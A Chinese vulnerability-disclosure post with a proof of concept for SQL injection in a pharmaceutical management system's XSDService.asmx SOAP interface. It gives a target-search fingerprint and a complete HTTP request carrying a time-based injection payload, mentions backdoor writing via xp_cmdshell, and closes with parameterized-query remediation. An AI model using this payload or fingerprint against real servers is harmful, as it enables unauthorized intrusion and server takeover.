文章总结： 药业管理软件XSDService.asmx接口存在SQL注入漏洞，攻击者可利用相关方法构造恶意SQL语句，通过xp_cmdshell写入后门文件，最终获取服务器完全控制。建议使用预编译语句或参数化查询修复，避免直接拼接SQL。 综合评分： 78 文章分类： 漏洞POC,漏洞分析,WEB安全

药业管理软件XSDService.asmx存在SQL注入漏洞 附POC

安服仔

北风漏洞复现文库

2025年12月26日 00:11 广东

免责声明：请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

#

#

01

—

漏洞名称

药业管理软件XSDService.asmx存在SQL注入漏洞

02

—

影响版本

                                    药业管理软件XSDService.asmx存在SQL注入漏洞

03

—

漏洞简介

药业管理软件是一款针对我国医药或医疗器械企业经营管理特点而设计的综合管理软件。药业管理软件的XSDService.asmx接口（如GetPdaTable、ExecPdaSql等方法）存在SQL注入漏洞。攻击者可利用这些接口，通过发送恶意SQL语句，调用xp_cmdshell写入后门文件，实现对服务器的完全控制。

04

—

资产测绘

body="XSDService.asmx"

05

—

漏洞复现

 POC

POST /XSDService.asmx HTTP/1.1Host: X.X.X.XContent-Type: text/xml; charset=utf-8Content-Length: 490SOAPAction: "http://tempuri.org/SetMedia_Picture_info"<?xml version="1.0"&nbsp;encoding="utf-8"?><soap:Envelope&nbsp;xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"&nbsp;xmlns:xsd="http://www.w3.org/2001/XMLSchema"&nbsp;xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">&nbsp;&nbsp;<soap:Body>&nbsp; &nbsp;&nbsp;<SetMedia_Picture_info&nbsp;xmlns="http://tempuri.org/">&nbsp; &nbsp; &nbsp;&nbsp;<info_id>1';WAITFOR DELAY '0:0:5'--</info_id>&nbsp; &nbsp; &nbsp;&nbsp;<info_file_name>string</info_file_name>&nbsp; &nbsp; &nbsp;&nbsp;<info_data>base64Binary</info_data>&nbsp; &nbsp;&nbsp;</SetMedia_Picture_info>&nbsp;&nbsp;</soap:Body></soap:Envelope>

06

—

修复建议

使用预编译语句或参数化查询，避免直接拼接SQL语句

07

—

往期回顾

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：北风漏洞复现文库 安服仔《药业管理软件XSDService.asmx存在SQL注入漏洞 附POC》